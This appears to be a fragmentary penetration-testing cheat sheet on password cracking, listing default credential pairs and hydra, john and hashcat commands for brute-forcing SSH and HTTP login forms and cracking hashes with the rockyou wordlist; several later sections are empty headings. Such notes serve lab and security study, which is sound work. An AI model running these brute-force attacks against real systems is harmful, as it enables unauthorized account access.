githubEdit

Password Cracking

Default Credentials

admin:admin admin:password root:root root:toor

Password Attacks

Try same user, reverse user and null as password against a login for a quick check

hydra -l USER -e nsr IP ssh -V

You can use a username wordlist as well

hydra -L USERLIST -e nsr IP ssh -V

Burpsuite Intruder if we want to

john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt

sudo gzip -d rockyou.txt.gz

hydra -l noman -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.10.10

hydra -l noman -P /usr/share/wordlists/rockyou.txt 192.168.10.10 http-post

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.10.10 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"

hashcat -b | hashcat.exe -b (linux and window benchmark)

customize wordlists

Create wordlist for a specific user to drastically reduce attack time

if we want to add 1 in all password then |

Zip Cracking

NTLM Crack

Then

Last updated